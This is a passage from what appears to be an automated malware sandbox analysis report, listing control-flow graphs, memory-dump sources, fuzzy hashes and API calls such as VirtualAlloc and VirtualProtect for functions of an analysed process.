225->224 226->242 227->226 234 7ffd9b89bb0f-7ffd9b89bb35 228->234 235 7ffd9b89baf1-7ffd9b89bafe 228->235 229->228 239 7ffd9b89bb05-7ffd9b89bb0d 235->239 240 7ffd9b89bb00 235->240 236->64 246 7ffd9b89a616-7ffd9b89a66b 237->246 247 7ffd9b89a609-7ffd9b89a611 237->247 239->234 240->239 242->195 251 7ffd9b89a67a-7ffd9b89a6cf 246->251 252 7ffd9b89a66d-7ffd9b89a675 246->252 247->64 256 7ffd9b89a6de-7ffd9b89a733 251->256 257 7ffd9b89a6d1-7ffd9b89a6d9 251->257 252->64 261 7ffd9b89a735-7ffd9b89a73d 256->261 262 7ffd9b89a742-7ffd9b89a797 256->262 257->64 261->64 266 7ffd9b89a7a6-7ffd9b89a7fb 262->266 267 7ffd9b89a799-7ffd9b89a7a1 262->267 271 7ffd9b89a807-7ffd9b89a85c 266->271 272 7ffd9b89a7fd-7ffd9b89a805 266->272 267->64 276 7ffd9b89a868-7ffd9b89a86a 271->276 277 7ffd9b89a85e-7ffd9b89a866 271->277 272->64 276->64 277->64
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000014.00000002.2807107018.00007FFD9B899000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B899000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_20_2_7ffd9b899000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 2$H$zM_H
                                                                                                                                      • API String ID: 0-2006335857
                                                                                                                                      • Opcode ID: a5e3893bb9a679acbdde7578f7d4aace76a945a8f72a91a21c66bd10a61e658d
                                                                                                                                      • Instruction ID: eb1ac838aad03b7ee5a8cd2a3492be0c60d6e3356e8c568af0cf6512a2cc616d
                                                                                                                                      • Opcode Fuzzy Hash: a5e3893bb9a679acbdde7578f7d4aace76a945a8f72a91a21c66bd10a61e658d
                                                                                                                                      • Instruction Fuzzy Hash: E8C2D774E1992D8FDBA8DB58C8A4BA9B7B1FF58300F5041E9D01DE72A5DB346A81CF40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8C312D Relevance: 1.8, Strings: 1, Instructions: 515COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 325 7ffd9b8c312d-7ffd9b8c314c 327 7ffd9b8c3196-7ffd9b8c323a 325->327 328 7ffd9b8c314e-7ffd9b8c3182 325->328 332 7ffd9b8c323c-7ffd9b8c3241 327->332 333 7ffd9b8c3244-7ffd9b8c324d 327->333 330 7ffd9b8c3189-7ffd9b8c3190 328->330 331 7ffd9b8c3184 328->331 330->327 331->330 332->333 334 7ffd9b8c36dd-7ffd9b8c36e3 333->334 335 7ffd9b8c36e9-7ffd9b8c3702 334->335 336 7ffd9b8c3252-7ffd9b8c327c 334->336 337 7ffd9b8c327e 336->337 338 7ffd9b8c3283-7ffd9b8c329c 336->338 337->338 339 7ffd9b8c329e 338->339 340 7ffd9b8c32a3-7ffd9b8c32bd 338->340 339->340 342 7ffd9b8c32bf 340->342 343 7ffd9b8c32c4-7ffd9b8c32dc 340->343 342->343 344 7ffd9b8c32de 343->344 345 7ffd9b8c32e3-7ffd9b8c3304 343->345 344->345 346 7ffd9b8c3306-7ffd9b8c330a 345->346 347 7ffd9b8c3372-7ffd9b8c338f 345->347 346->347 348 7ffd9b8c330c-7ffd9b8c3320 346->348 349 7ffd9b8c3396-7ffd9b8c33af 347->349 350 7ffd9b8c3391 347->350 353 7ffd9b8c3364-7ffd9b8c336a 348->353 351 7ffd9b8c33b6-7ffd9b8c33d0 349->351 352 7ffd9b8c33b1 349->352 350->349 354 7ffd9b8c33d7-7ffd9b8c33ef 351->354 355 7ffd9b8c33d2 351->355 352->351 356 7ffd9b8c336c-7ffd9b8c336d 353->356 357 7ffd9b8c3322-7ffd9b8c3326 353->357 360 7ffd9b8c33f6-7ffd9b8c3400 354->360 361 7ffd9b8c33f1 354->361 355->354 362 7ffd9b8c3403-7ffd9b8c343a 356->362 358 7ffd9b8c3328-7ffd9b8c332e 357->358 359 7ffd9b8c3331-7ffd9b8c3347 357->359 358->359 363 7ffd9b8c3349 359->363 364 7ffd9b8c334e-7ffd9b8c3361 359->364 360->362 361->360 365 7ffd9b8c343c-7ffd9b8c3441 362->365 366 7ffd9b8c3444-7ffd9b8c3520 362->366 363->364 364->353 365->366 367 7ffd9b8c352a-7ffd9b8c359f 366->367 368 7ffd9b8c3522-7ffd9b8c3527 366->368 369 7ffd9b8c35f8-7ffd9b8c35fc 367->369 370 7ffd9b8c35a1-7ffd9b8c35ba 367->370 368->367 371 7ffd9b8c35fe 369->371 372 7ffd9b8c3603-7ffd9b8c361c 369->372 373 7ffd9b8c35bc-7ffd9b8c35c0 370->373 374 7ffd9b8c362d-7ffd9b8c3644 370->374 371->372 376 7ffd9b8c361f-7ffd9b8c3625 372->376 373->374 375 7ffd9b8c35c2-7ffd9b8c35d1 373->375 377 7ffd9b8c3646 374->377 378 7ffd9b8c364b-7ffd9b8c3665 374->378 375->376 379 7ffd9b8c3627-7ffd9b8c3628 376->379 380 7ffd9b8c35d3-7ffd9b8c35d7 376->380 377->378 381 7ffd9b8c3667 378->381 382 7ffd9b8c366c-7ffd9b8c3690 378->382 387 7ffd9b8c36d5-7ffd9b8c36da 379->387 385 7ffd9b8c35eb-7ffd9b8c35f2 380->385 386 7ffd9b8c35d9-7ffd9b8c35e8 380->386 381->382 383 7ffd9b8c3697-7ffd9b8c36bb 382->383 384 7ffd9b8c3692 382->384 388 7ffd9b8c36bd 383->388 389 7ffd9b8c36c2-7ffd9b8c36d3 383->389 384->383 385->369 386->385 387->334 388->389 389->387
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000014.00000002.2807107018.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_20_2_7ffd9b8c3000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: Em>N
                                                                                                                                      • API String ID: 0-488659082
                                                                                                                                      • Opcode ID: 612d148e11efb965369db35dce34415fdcb62cf1312b0d657f9cfbf082cb0742
                                                                                                                                      • Instruction ID: ffe3c107ef308655b8733be9d4bc57c50ea20b819f5c53ec6040dcc26d597533
                                                                                                                                      • Opcode Fuzzy Hash: 612d148e11efb965369db35dce34415fdcb62cf1312b0d657f9cfbf082cb0742
                                                                                                                                      • Instruction Fuzzy Hash: 40222670E0421D8FDB58DFA8C895AEDBBB2FF48300F14866AD419EB255DB34A985CF50
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B880DA8 Relevance: .3, Instructions: 286COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000014.00000002.2807107018.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_20_2_7ffd9b880000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 4eb7a3a50adc4dffd42bbe09d4555bee91ca21fdf21866dca74289fa1ccacdbb
                                                                                                                                      • Instruction ID: 91352fb85883f8000b88a70aa522183f6d59aa06922576ec28f7e12d8a52a8fd
                                                                                                                                      • Opcode Fuzzy Hash: 4eb7a3a50adc4dffd42bbe09d4555bee91ca21fdf21866dca74289fa1ccacdbb
                                                                                                                                      • Instruction Fuzzy Hash: ADA1E071A19A4D8FE798EB6CC8647A97BE1FFA9300F4001BED05DD72E6CBB428018741
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B891AE1 Relevance: 1.8, APIs: 1, Instructions: 520memoryCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 278 7ffd9b891ae1-7ffd9b891b15 280 7ffd9b891b17 278->280 281 7ffd9b891b1c-7ffd9b891b6b 278->281 280->281 284 7ffd9b891b6d 281->284 285 7ffd9b891b72-7ffd9b891bbb 281->285 284->285 288 7ffd9b891bbd 285->288 289 7ffd9b891bc2-7ffd9b891c15 285->289 288->289 292 7ffd9b891c17 289->292 293 7ffd9b891c1c-7ffd9b891c69 289->293 292->293 296 7ffd9b891c6b 293->296 297 7ffd9b891c70-7ffd9b891cc0 293->297 296->297 300 7ffd9b891cc7-7ffd9b891d38 297->300 301 7ffd9b891cc2 297->301 304 7ffd9b891d3a 300->304 305 7ffd9b891d3f-7ffd9b891d48 300->305 301->300 304->305 306 7ffd9b891dda-7ffd9b891f53 VirtualAlloc 305->306 307 7ffd9b891d4e-7ffd9b891dae call 7ffd9b88fe40 305->307 317 7ffd9b891f55 306->317 318 7ffd9b891f5b-7ffd9b891fbf 306->318 323 7ffd9b891db6-7ffd9b891dd3 307->323 317->318 323->306
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000014.00000002.2807107018.00007FFD9B88F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B88F000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_20_2_7ffd9b88f000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                      • Opcode ID: 7dfe0e1c947eab356262f9cac60e8a535105ec760442a1cc9bd3ad177f4c6f2f
                                                                                                                                      • Instruction ID: dbe919d1488b9925405d6245cdbb60af8d98de20643db90e10824a04ccbe1923
                                                                                                                                      • Opcode Fuzzy Hash: 7dfe0e1c947eab356262f9cac60e8a535105ec760442a1cc9bd3ad177f4c6f2f
                                                                                                                                      • Instruction Fuzzy Hash: AA029E3090DA8D8FDF95EF68C855AE97BF1FF59300F0101AAE448D72A2DB34A985CB41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8903FE Relevance: 1.7, APIs: 1, Instructions: 190memoryCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 390 7ffd9b8903fe-7ffd9b89040b 391 7ffd9b890416-7ffd9b890427 390->391 392 7ffd9b89040d-7ffd9b890415 390->392 393 7ffd9b890429-7ffd9b890431 391->393 394 7ffd9b890432-7ffd9b89054b VirtualProtect 391->394 392->391 393->394 399 7ffd9b89054d 394->399 400 7ffd9b890553-7ffd9b8905a3 394->400 399->400
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000014.00000002.2807107018.00007FFD9B88F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B88F000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_20_2_7ffd9b88f000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 544645111-0
                                                                                                                                      • Opcode ID: 9b83865c25587fa3ca2f9dab4e3e08f9581a2cfdc5c32e1181a0cbf12bf8a22f
                                                                                                                                      • Instruction ID: 605fa173f2b3929a505135a45bcb3001d5fad243aa1ee5d40a56158ae7331512
                                                                                                                                      • Opcode Fuzzy Hash: 9b83865c25587fa3ca2f9dab4e3e08f9581a2cfdc5c32e1181a0cbf12bf8a22f
                                                                                                                                      • Instruction Fuzzy Hash: 21517E70D0864D8FDF54DFA8C845AEDBBF0FB6A310F1042AAD449E3256DB74A885CB81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B894A02 Relevance: 1.3, Strings: 1, Instructions: 68COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 403 7ffd9b894a02-7ffd9b894a35 405 7ffd9b894a3f-7ffd9b894a78 403->405 407 7ffd9b894a86-7ffd9b894a8d 405->407 408 7ffd9b894a7a-7ffd9b894a84 405->408 409 7ffd9b894aad-7ffd9b894f8c 407->409 410 7ffd9b894a8f-7ffd9b894c74 407->410 408->407 409->407 417 7ffd9b894f92-7ffd9b894f9c 409->417 410->407 416 7ffd9b894c7a-7ffd9b894c84 410->416 416->407 417->407
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000014.00000002.2807107018.00007FFD9B894000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B894000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_20_2_7ffd9b894000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: +
                                                                                                                                      • API String ID: 0-2126386893
                                                                                                                                      • Opcode ID: eddafa6d9939922604de03f4b42bac5449ee708ba016fa87cdb1dab642ab38f9
                                                                                                                                      • Instruction ID: 4e0f4fe64aea6ad4236fe90158fee17b74f40b1303a9f276293543852cdea031
                                                                                                                                      • Opcode Fuzzy Hash: eddafa6d9939922604de03f4b42bac5449ee708ba016fa87cdb1dab642ab38f9
                                                                                                                                      • Instruction Fuzzy Hash: E0310370A1962D8FEBB8DB54C8A47A9B7F1FF49300F1041E9D04DA2291DB786BC48F41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B894AB9 Relevance: 1.3, Strings: 1, Instructions: 35COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 418 7ffd9b894ab9-7ffd9b894ac2 420 7ffd9b894acd-7ffd9b894b0c 418->420 422 7ffd9b894a86-7ffd9b894a8d 420->422 423 7ffd9b894b12-7ffd9b894b1c 420->423 424 7ffd9b894aad-7ffd9b894f8c 422->424 425 7ffd9b894a8f-7ffd9b894c74 422->425 423->422 424->422 432 7ffd9b894f92-7ffd9b894f9c 424->432 425->422 431 7ffd9b894c7a-7ffd9b894c84 425->431 431->422 432->422
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000014.00000002.2807107018.00007FFD9B894000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B894000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_20_2_7ffd9b894000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: +
                                                                                                                                      • API String ID: 0-2126386893
                                                                                                                                      • Opcode ID: 111eade1d85496f17a1b5b37a15ded02e881aba5c8b45211e355e1e47b7e3657
                                                                                                                                      • Instruction ID: da2f7102d7140afc8d291e74577f2382fc3fe1e26ffe2646bbdbf67258b7c6f3
                                                                                                                                      • Opcode Fuzzy Hash: 111eade1d85496f17a1b5b37a15ded02e881aba5c8b45211e355e1e47b7e3657
                                                                                                                                      • Instruction Fuzzy Hash: 5B011A30E4561E8EEBB8DF54C8987E8B6F1EB59341F1542FAD05CD22A1DA741AC48F41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B899F14 Relevance: .6, Instructions: 635COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 433 7ffd9b899f14-7ffd9b899f23 434 7ffd9b899f25 433->434 435 7ffd9b899f2a-7ffd9b89b177 call 7ffd9b89c00a 433->435 434->435 440 7ffd9b89b179-7ffd9b89b187 435->440 441 7ffd9b89b192-7ffd9b89b21b 440->441 445 7ffd9b89b221-7ffd9b89b2aa 441->445 446 7ffd9b89b2b3-7ffd9b89b2d5 441->446 445->446 464 7ffd9b89b2ac 445->464 449 7ffd9b89b426-7ffd9b89b4bc 446->449 450 7ffd9b89b2db-7ffd9b89b326 446->450 469 7ffd9b89b57f-7ffd9b89b5c5 449->469 470 7ffd9b89b4c2-7ffd9b89b4ce 449->470 460 7ffd9b89b40d-7ffd9b89b41a 450->460 462 7ffd9b89b32b-7ffd9b89b339 460->462 463 7ffd9b89b420-7ffd9b89b421 460->463 465 7ffd9b89b33b 462->465 466 7ffd9b89b340-7ffd9b89b3a2 462->466 468 7ffd9b89b734-7ffd9b89b793 463->468 464->446 465->466 475 7ffd9b89b3a9-7ffd9b89b3fb 466->475 476 7ffd9b89b3a4 466->476 485 7ffd9b89ba5b-7ffd9b89ba88 468->485 487 7ffd9b89b5cc-7ffd9b89b5d2 469->487 477 7ffd9b89b51d-7ffd9b89b57d call 7ffd9b899a58 470->477 478 7ffd9b89b4d0-7ffd9b89b51c 470->478 499 7ffd9b89b405-7ffd9b89b40a 475->499 500 7ffd9b89b3fd-7ffd9b89b402 475->500 476->475 477->487 478->477 497 7ffd9b89b798-7ffd9b89b7d4 485->497 498 7ffd9b89ba8e-7ffd9b89bab2 call 7ffd9b89c043 485->498 490 7ffd9b89b721-7ffd9b89b72e 487->490 490->468 493 7ffd9b89b5d7-7ffd9b89b5e5 490->493 494 7ffd9b89b5e7 493->494 495 7ffd9b89b5ec-7ffd9b89b646 493->495 494->495 511 7ffd9b89b6b6-7ffd9b89b6de 495->511 512 7ffd9b89b648-7ffd9b89b670 495->512 506 7ffd9b89b7d6-7ffd9b89b7ed 497->506 507 7ffd9b89b7f1-7ffd9b89ba58 497->507 518 7ffd9b89babb-7ffd9b89baef 498->518 519 7ffd9b89bab4 498->519 499->460 500->499 506->507 507->485 514 7ffd9b89b6e5-7ffd9b89b70e 511->514 515 7ffd9b89b6e0 511->515 516 7ffd9b89b677-7ffd9b89b6b4 512->516 517 7ffd9b89b672 512->517 528 7ffd9b89b719-7ffd9b89b71e 514->528 515->514 516->528 517->516 523 7ffd9b89bb0f-7ffd9b89bb35 518->523 524 7ffd9b89baf1-7ffd9b89bafe 518->524 519->518 526 7ffd9b89bb05-7ffd9b89bb0d 524->526 527 7ffd9b89bb00 524->527 526->523 527->526 528->490
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000014.00000002.2807107018.00007FFD9B899000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B899000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_20_2_7ffd9b899000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 69b8cc3fec3c6c200716316c244af780e67adcddc1d9b9f06af76fbf70147bb4
                                                                                                                                      • Instruction ID: 4eead7ca18541a69e5b085808e071465375fc0e7c48d07e6d02df18b9f56ab8e
                                                                                                                                      • Opcode Fuzzy Hash: 69b8cc3fec3c6c200716316c244af780e67adcddc1d9b9f06af76fbf70147bb4
                                                                                                                                      • Instruction Fuzzy Hash: B942AC70A0991D8FDFA8DF58C895AA9B7B2FF98301F1141E9D00DD72A5DA35AE81CF40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8C527D Relevance: .4, Instructions: 367COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000014.00000002.2807107018.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_20_2_7ffd9b8c3000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 119e34bc25bbe677624d79eefbcfb88dc1046b867057a1c2945ac4154d4572ba
                                                                                                                                      • Instruction ID: 88611a6c14a18fce6b6c5543a0fc41ea59210c147374c3482326d47b819cf9e6
                                                                                                                                      • Opcode Fuzzy Hash: 119e34bc25bbe677624d79eefbcfb88dc1046b867057a1c2945ac4154d4572ba
                                                                                                                                      • Instruction Fuzzy Hash: 09D15DB1E1964D8FEB58EB58C8A5BF8B7B1FF58300F4401BAD00D972E2DA346981CB41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B89AFA6 Relevance: .4, Instructions: 365COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 704 7ffd9b89afa6-7ffd9b89afcf 706 7ffd9b89afe2 704->706 707 7ffd9b89afd1 704->707 708 7ffd9b89b031-7ffd9b89b05f 706->708 709 7ffd9b89afe4-7ffd9b89aff7 706->709 707->706 712 7ffd9b89b0b8-7ffd9b89b0be 708->712 709->708 713 7ffd9b89b0c0-7ffd9b89b0cf 712->713 714 7ffd9b89b061-7ffd9b89b09c 712->714 715 7ffd9b89b0ff-7ffd9b89b10b 713->715 717 7ffd9b89b09e 714->717 718 7ffd9b89b0a3-7ffd9b89b0b5 714->718 719 7ffd9b89b116-7ffd9b89b134 715->719 717->718 718->712 721 7ffd9b89b137-7ffd9b89b13d 719->721 722 7ffd9b89ad54-7ffd9b89add4 721->722 723 7ffd9b89b143-7ffd9b89b177 call 7ffd9b89c00a 721->723 732 7ffd9b89add6-7ffd9b89ade2 722->732 733 7ffd9b89ae04-7ffd9b89ae13 722->733 737 7ffd9b89b179-7ffd9b89b187 723->737 738 7ffd9b89ae31-7ffd9b89ae39 732->738 739 7ffd9b89ade4-7ffd9b89adf9 732->739 735 7ffd9b89ae15 733->735 736 7ffd9b89ae1a-7ffd9b89ae29 733->736 735->736 740 7ffd9b89ae2b-7ffd9b89ae2c 736->740 741 7ffd9b89ae3e-7ffd9b89ae59 736->741 742 7ffd9b89b192-7ffd9b89b21b 737->742 738->719 739->733 740->738 743 7ffd9b89ae79-7ffd9b89b0dd 741->743 744 7ffd9b89ae5b-7ffd9b89ae75 741->744 754 7ffd9b89b221-7ffd9b89b2aa 742->754 755 7ffd9b89b2b3-7ffd9b89b2d5 742->755 749 7ffd9b89b12c-7ffd9b89b134 743->749 750 7ffd9b89b0df-7ffd9b89b0f4 743->750 744->743 749->721 750->715 754->755 773 7ffd9b89b2ac 754->773 758 7ffd9b89b426-7ffd9b89b4bc 755->758 759 7ffd9b89b2db-7ffd9b89b326 755->759 778 7ffd9b89b57f-7ffd9b89b5c5 758->778 779 7ffd9b89b4c2-7ffd9b89b4ce 758->779 769 7ffd9b89b40d-7ffd9b89b41a 759->769 771 7ffd9b89b32b-7ffd9b89b339 769->771 772 7ffd9b89b420-7ffd9b89b421 769->772 774 7ffd9b89b33b 771->774 775 7ffd9b89b340-7ffd9b89b3a2 771->775 777 7ffd9b89b734-7ffd9b89b793 772->777 773->755 774->775 784 7ffd9b89b3a9-7ffd9b89b3fb 775->784 785 7ffd9b89b3a4 775->785 794 7ffd9b89ba5b-7ffd9b89ba88 777->794 796 7ffd9b89b5cc-7ffd9b89b5d2 778->796 786 7ffd9b89b51d-7ffd9b89b57d call 7ffd9b899a58 779->786 787 7ffd9b89b4d0-7ffd9b89b51c 779->787 808 7ffd9b89b405-7ffd9b89b40a 784->808 809 7ffd9b89b3fd-7ffd9b89b402 784->809 785->784 786->796 787->786 806 7ffd9b89b798-7ffd9b89b7d4 794->806 807 7ffd9b89ba8e-7ffd9b89bab2 call 7ffd9b89c043 794->807 799 7ffd9b89b721-7ffd9b89b72e 796->799 799->777 802 7ffd9b89b5d7-7ffd9b89b5e5 799->802 803 7ffd9b89b5e7 802->803 804 7ffd9b89b5ec-7ffd9b89b646 802->804 803->804 820 7ffd9b89b6b6-7ffd9b89b6de 804->820 821 7ffd9b89b648-7ffd9b89b670 804->821 815 7ffd9b89b7d6-7ffd9b89b7ed 806->815 816 7ffd9b89b7f1-7ffd9b89ba58 806->816 827 7ffd9b89babb-7ffd9b89baef 807->827 828 7ffd9b89bab4 807->828 808->769 809->808 815->816 816->794 823 7ffd9b89b6e5-7ffd9b89b70e 820->823 824 7ffd9b89b6e0 820->824 825 7ffd9b89b677-7ffd9b89b6b4 821->825 826 7ffd9b89b672 821->826 837 7ffd9b89b719-7ffd9b89b71e 823->837 824->823 825->837 826->825 832 7ffd9b89bb0f-7ffd9b89bb35 827->832 833 7ffd9b89baf1-7ffd9b89bafe 827->833 828->827 835 7ffd9b89bb05-7ffd9b89bb0d 833->835 836 7ffd9b89bb00 833->836 835->832 836->835 837->799
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000014.00000002.2807107018.00007FFD9B899000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B899000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_20_2_7ffd9b899000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 6ef12ce13a47105276b091e996158d251ea20b8c2561310e9a305a6455906636
                                                                                                                                      • Instruction ID: 635815ba314535664376e2b556949d1e51d411ce3dfda64859bcbe7cb99aa7fd
                                                                                                                                      • Opcode Fuzzy Hash: 6ef12ce13a47105276b091e996158d251ea20b8c2561310e9a305a6455906636
                                                                                                                                      • Instruction Fuzzy Hash: AEE1DC70A0991D8FDFA8DF58C895AA9B7B1FF98300F1141E9D01DE72A5DA35AA81CF40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B89AFFB Relevance: .3, Instructions: 324COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 881 7ffd9b89affb-7ffd9b89affd 882 7ffd9b89b07a-7ffd9b89b07c 881->882 883 7ffd9b89afff-7ffd9b89b011 881->883 885 7ffd9b89b085-7ffd9b89b09c 882->885 884 7ffd9b89b0ff-7ffd9b89b10b 883->884 886 7ffd9b89b116-7ffd9b89b134 884->886 887 7ffd9b89b09e 885->887 888 7ffd9b89b0a3-7ffd9b89b0be 885->888 893 7ffd9b89b137-7ffd9b89b13d 886->893 887->888 890 7ffd9b89b0c0-7ffd9b89b0cf 888->890 891 7ffd9b89b061-7ffd9b89b079 888->891 890->884 891->885 894 7ffd9b89ad54-7ffd9b89add4 893->894 895 7ffd9b89b143-7ffd9b89b177 call 7ffd9b89c00a 893->895 904 7ffd9b89add6-7ffd9b89ade2 894->904 905 7ffd9b89ae04-7ffd9b89ae13 894->905 909 7ffd9b89b179-7ffd9b89b187 895->909 910 7ffd9b89ae31-7ffd9b89ae39 904->910 911 7ffd9b89ade4-7ffd9b89adf9 904->911 907 7ffd9b89ae15 905->907 908 7ffd9b89ae1a-7ffd9b89ae29 905->908 907->908 912 7ffd9b89ae2b-7ffd9b89ae2c 908->912 913 7ffd9b89ae3e-7ffd9b89ae59 908->913 914 7ffd9b89b192-7ffd9b89b21b 909->914 910->886 911->905 912->910 915 7ffd9b89ae79-7ffd9b89b0dd 913->915 916 7ffd9b89ae5b-7ffd9b89ae75 913->916 926 7ffd9b89b221-7ffd9b89b2aa 914->926 927 7ffd9b89b2b3-7ffd9b89b2d5 914->927 921 7ffd9b89b12c-7ffd9b89b134 915->921 922 7ffd9b89b0df-7ffd9b89b0f4 915->922 916->915 921->893 922->884 926->927 945 7ffd9b89b2ac 926->945 930 7ffd9b89b426-7ffd9b89b4bc 927->930 931 7ffd9b89b2db-7ffd9b89b326 927->931 950 7ffd9b89b57f-7ffd9b89b5c5 930->950 951 7ffd9b89b4c2-7ffd9b89b4ce 930->951 941 7ffd9b89b40d-7ffd9b89b41a 931->941 943 7ffd9b89b32b-7ffd9b89b339 941->943 944 7ffd9b89b420-7ffd9b89b421 941->944 946 7ffd9b89b33b 943->946 947 7ffd9b89b340-7ffd9b89b3a2 943->947 949 7ffd9b89b734-7ffd9b89b793 944->949 945->927 946->947 956 7ffd9b89b3a9-7ffd9b89b3fb 947->956 957 7ffd9b89b3a4 947->957 966 7ffd9b89ba5b-7ffd9b89ba88 949->966 968 7ffd9b89b5cc-7ffd9b89b5d2 950->968 958 7ffd9b89b51d-7ffd9b89b57d call 7ffd9b899a58 951->958 959 